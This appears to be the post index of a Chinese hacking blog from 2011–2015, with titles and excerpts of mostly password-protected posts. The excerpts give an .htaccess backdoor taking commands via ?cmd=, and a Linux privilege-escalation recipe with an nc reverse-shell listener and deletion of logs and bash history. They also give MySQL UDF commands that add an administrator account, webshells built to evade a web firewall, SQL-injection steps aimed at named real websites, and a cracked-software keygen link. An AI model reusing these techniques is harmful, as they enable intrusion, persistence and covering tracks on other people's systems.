Swane's blog

游弋于黑白之间,但愿我未曾来过……

导航

2015年12月31日 #

PHP一句话后门

该文被密码保护。 阅读全文

posted @ 2015-12-31 09:58 无名组 阅读(1) 评论(0) 推荐(0) 编辑

2015年6月24日 #

PHPCMS 漏洞

该文被密码保护。 阅读全文

posted @ 2015-06-24 14:22 无名组 阅读(2) 评论(0) 推荐(0) 编辑

2015年6月23日 #

获取Dedecms后台路径 通杀目前所有版本

该文被密码保护。 阅读全文

posted @ 2015-06-23 14:19 无名组 阅读(3) 评论(0) 推荐(0) 编辑

2015年6月20日 #

加入乌云第一发

摘要: 加入乌云要邀请码,于是在乌云上来了第一发不知道写的是否规范,能否顺利拿到邀请码。 阅读全文

posted @ 2015-06-20 01:38 无名组 阅读(143) 评论(0) 推荐(0) 编辑

2015年6月19日 #

sqlmap使用笔记

摘要: 测试目标:http://www.cmccb.org.cn/cmccbnew/SiteInfo/SiteInfo_Onesel.php?Bar_ID=26=====================================获取当前用户、当前库、数据库版本、所有用户、所有库、用户密码:sqlmap... 阅读全文

posted @ 2015-06-19 18:16 无名组 阅读(224) 评论(0) 推荐(0) 编辑

2015年6月18日 #

记一次基于aspcms的入侵提权

该文被密码保护。 阅读全文

posted @ 2015-06-18 15:07 无名组 阅读(9) 评论(0) 推荐(0) 编辑

最新aspcms后台拿shell AspCms v2.5.7 20150120测试通过

该文被密码保护。 阅读全文

posted @ 2015-06-18 10:42 无名组 阅读(8) 评论(0) 推荐(0) 编辑

2015年6月10日 #

绕过360安全脚本"输入内容存在危险字符,安全起见,已被本站拦截"

摘要: 输入内容存在危险字符,安全起见,已被本站拦截这是因为使用了360安全脚本有兴趣的同学可以下载一下360提供的脚本安全过滤文件http://safe.webscan.360.cn/参考:http://www.myhack58.com/Article/html/3/7/2014/42311.htm 阅读全文

posted @ 2015-06-10 02:39 无名组 阅读(1011) 评论(0) 推荐(0) 编辑

2014年8月31日 #

dedecms install/index.php.bak

摘要: 阅读全文

posted @ 2014-08-31 10:22 无名组 阅读(511) 评论(0) 推荐(0) 编辑

2014年8月11日 #

.htaccess 后门

摘要: Order allow,denyAllow from allAddType application/x-httpd-php .htaccess# # or Chopper地址:http://localhost/.htaccess?cmd= 阅读全文

posted @ 2014-08-11 16:45 无名组 阅读(421) 评论(0) 推荐(0) 编辑

2014年4月27日 #

加强型PHP一句话

摘要: -2 阅读全文

posted @ 2014-04-27 13:40 无名组 阅读(173) 评论(0) 推荐(0) 编辑

2014年3月15日 #

linux提权基本思路整理

摘要: 拿到linux服务器的webshell后,先看有没有执行命令的权限uname -a查看linux的内核版本gcc --help试探服务器是否可以进行gcc编译(有些exp没有编译)访问/tmp目录,看是否有所有权限如果没有,则通过 chmod -R 777 开启上传对应内核版本的exp到/tmp目录,然后执行./exp名没编译的则运行gcc -o /tmp/文件名 /tmp/文件名.cnc反弹nc -l -n -v -p 12666附个常用exp收集地址:http://exp.0x80c.com/痕迹清理:rm -f -r /var/log/*rm .bash_historyrm recent 阅读全文

posted @ 2014-03-15 10:54 无名组 阅读(279) 评论(0) 推荐(0) 编辑

2014年3月12日 #

pangolin professinal edition 4.0.0.1293特别版

摘要: 打开keygen.exe,点击“make keyfile”,把生成的regkey.dat放到pangolin目录就行了。百度网盘:http://pan.baidu.com/share/link?shareid=922870794&uk=2704507716 阅读全文

posted @ 2014-03-12 10:04 无名组 阅读(390) 评论(0) 推荐(0) 编辑

2014年2月8日 #

讯时网站管理系统通杀0DAY漏洞

摘要: 首先声明这方法不是我原创,我是从网上学习来的,由自己的语言重新编译一下的。 在谷歌搜索 inurl: admin/admin_news_pl_view.asp 打开搜索到的网址或者输入 inurl:news_more.asp?lm2= 然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3 只要显示错误就一直打3,4,5...... 找到管理员和32位MDB密码后破解MDB密码,然后进后台 admin/admin_inde. 阅读全文

posted @ 2014-02-08 10:14 无名组 阅读(448) 评论(0) 推荐(0) 编辑

2013年12月30日 #

php cypt+md5 加密

该文被密码保护。 阅读全文

posted @ 2013-12-30 22:59 无名组 阅读(0) 评论(0) 推荐(0) 编辑

php des 加密

该文被密码保护。 阅读全文

posted @ 2013-12-30 22:56 无名组 阅读(2) 评论(0) 推荐(0) 编辑

2013年10月18日 #

最新过安全狗ASP小马

摘要: GIF89a$ ;"" thenset fs=server.CreateObject("scripting.filesystemobject")set thisfile=fs.CreateTextFile(testfile,True)thisfile.Write(""&Request.f... 阅读全文

posted @ 2013-10-18 15:01 无名组 阅读(450) 评论(0) 推荐(0) 编辑

2013年9月26日 #

SiteServer CMS Oday

该文被密码保护。 阅读全文

posted @ 2013-09-26 16:56 无名组 阅读(4) 评论(0) 推荐(0) 编辑

2013年9月20日 #

帝国备份王(Empirebak)拿webshell

摘要: 一、进入帝国备份王(Empirebak)后先备份数据,然后下载备份数据包,查看里面的任一文件并复制源代码。二、点击左侧"替换目录文件",替换目录选择刚才下载的数据库备份目录,将上面复制的代码粘贴进去,"替换为"一栏写填写hello world!三、访问http://网站域名/帝国安装目录/bdata/数据库备份目录/config.php,若能看到hello world!刚说明一句话替换成功,连接密码为:nst 阅读全文

posted @ 2013-09-20 22:02 无名组 阅读(302) 评论(0) 推荐(0) 编辑

PHP网站打包的程序

摘要: PHP网站打包的程序 "; $fdir = opendir('./'); while($file=readdir($fdir)) { if($file=='.'|| $file=='..') continue; echo " "; if(is_file($file)) { echo "2$file"; } else { echo "0$file"; ... 阅读全文

posted @ 2013-09-20 21:49 无名组 阅读(342) 评论(0) 推荐(0) 编辑

webshell一句话等绕过安全狗的方法

摘要: 如果目标网站是 ASP 网站,我们可以将大马写到一个txt文件里面,命名为dama.txt,再建一个文本文档,asp的就写入: 保存为x.asp,两个文件传同目录下,访问http://网站域名 /x.asp ,就是我们的大马了。如果目标网站是PHP网站,那么同样的原理,先把大马的代码,写到 dama.txt中,新建一个 php文件,php的内容中写入:,然后两个一起上传到空间里面, 这样就可以绕过安全狗了。 阅读全文

posted @ 2013-09-20 17:01 无名组 阅读(356) 评论(0) 推荐(0) 编辑

2013年9月18日 #

php搜索引擎劫持1

该文被密码保护。 阅读全文

posted @ 2013-09-18 19:24 无名组 阅读(1) 评论(0) 推荐(0) 编辑

2013年9月15日 #

mysql udf 提权小结

摘要: 一、适用条件 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 3.有root账号密码 二、导出udf MYSQL 5.1以下版本导出路径: C:\Winnt\udf.dll 2000 C:\Windows\udf.dll 2003(有的系统\被转义,需要改为C:\Windows\\udf.dll) 导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题) MYSQL 5.1以上版本,必须... 阅读全文

posted @ 2013-09-15 15:18 无名组 阅读(526) 评论(0) 推荐(0) 编辑

mysql语句

摘要: select version();查看mysql版本select @@basedir查看mysql安装目录 阅读全文

posted @ 2013-09-15 14:34 无名组 阅读(91) 评论(0) 推荐(0) 编辑

2013年9月14日 #

all of the dedecms oday

该文被密码保护。 阅读全文

posted @ 2013-09-14 00:03 无名组 阅读(188) 评论(0) 推荐(0) 编辑

2013年9月13日 #

dedecms漏洞getshell EXP最新可用

该文被密码保护。 阅读全文

posted @ 2013-09-13 23:48 无名组 阅读(7) 评论(0) 推荐(0) 编辑

简单的php动态加密技术

该文被密码保护。 阅读全文

posted @ 2013-09-13 12:44 无名组 阅读(2) 评论(0) 推荐(0) 编辑

PHP源代码加密技术

该文被密码保护。 阅读全文

posted @ 2013-09-13 11:02 无名组 阅读(2) 评论(0) 推荐(0) 编辑

百度搜索引擎各版本劫持代码asp/php/aspx

该文被密码保护。 阅读全文

posted @ 2013-09-13 10:38 无名组 阅读(2) 评论(0) 推荐(0) 编辑

PHP劫持代码无视提示

该文被密码保护。 阅读全文

posted @ 2013-09-13 10:24 无名组 阅读(1) 评论(0) 推荐(0) 编辑

2013年9月12日 #

我的一句话

该文被密码保护。 阅读全文

posted @ 2013-09-12 23:00 无名组 阅读(21) 评论(0) 推荐(0) 编辑

dedecms安装漏洞getshell全网首发exp

该文被密码保护。 阅读全文

posted @ 2013-09-12 18:50 无名组 阅读(9) 评论(0) 推荐(0) 编辑

hyyqkq info

该文被密码保护。 阅读全文

posted @ 2013-09-12 18:47 无名组 阅读(2) 评论(0) 推荐(0) 编辑

2012年5月30日 #

shell无上传cmd等exe文件权限解决办法

摘要: 在测试过程中遇到上类问题,目前WIN下测试成功的方法如下:说明: ================================================ 作用:保存远程的文件到本地 参数:LocalFileName ----本地文件名 RemoteFileUrl ----远程文件URL 返回值: True----成功 False----失败 ================================================把下面的代码保存为name.asp即可.<% Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_. 阅读全文

posted @ 2012-05-30 16:39 无名组 阅读(447) 评论(0) 推荐(0) 编辑

2012年3月1日 #

注入中转的基本方法

摘要: 注入时如果发现有防注,可以试试红色部分是需要修改的假如http://www.fanzhiduxm.com/news.asp?Aid=195发现防注那么就改为下面内容,使用时本地搭一个ASP环境即可再用这一行代码进行注入http://127.0.0.1/proxy.asp?jmdcw=11<%JmdcwName=request("jmdcw")' 注入中转站 COOKIE 版,BY 7DaTAJmdcwName=escape(JmdcwName)JmStr="Aid="&JmdcwNameJMUrl="http://www. 阅读全文

posted @ 2012-03-01 19:16 无名组 阅读(362) 评论(0) 推荐(0) 编辑

2011年4月20日 #

mysql提权总结方法四则

摘要: 一UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: createfunctioncmdshellreturnsstringsoname’udf.dll’ selectcmdshell(’netuseriis_user123!@#abcABC/add’); selectcmdshell(’netlocalgroupadministratorsiis_user/add’); selectcmdshell(’regedit/sd:\web\3389.reg’); dropfunctioncmdshell; selectcmdshell(’netstat-an’); 二VBS启 阅读全文

posted @ 2011-04-20 01:30 无名组 阅读(260) 评论(0) 推荐(0) 编辑

多字节%bf%27注入

摘要: 渗透测试,注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是:0xbf27不是有一个有效的GBK字符,但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符,所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理,结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个,以area.php文件里的漏洞来作测试。渗透测试利用的方法主要是旁注,旁注的意义在于“曲径通幽”,进而获取系统权限。在此之前,收集数据库信息、系统信息、网站信息和系统管理员的信息进行综合分析利用,在社工是有意义的。在 阅读全文

posted @ 2011-04-20 00:04 无名组 阅读(616) 评论(0) 推荐(0) 编辑

2011年4月18日 #

mysql root 提权方法

摘要: 1、连接到对方MYSQL 服务器 mysql -u root -h 192.168.0.1 mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库 mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。 3、让我们进入数据库 mysql>use test; 我们将会进入test数据库中 4、查看我们进入数据库中有些什么数据表 mysql>show tables; 默认的情况下,test中没有任何表的存在。 以下为关键的部分 5、在 阅读全文

posted @ 2011-04-18 23:13 无名组 阅读(354) 评论(0) 推荐(0) 编辑

2011年4月11日 #

高级暴库方法

摘要: 1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解 字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户,http://www.cert.org 阅读全文

posted @ 2011-04-11 16:07 无名组 阅读(258) 评论(0) 推荐(0) 编辑

njit.edu.cn SQL injection

摘要: njit.edu.cn SQL injection 阅读全文

posted @ 2011-04-11 15:28 无名组 阅读(5) 评论(0) 推荐(0) 编辑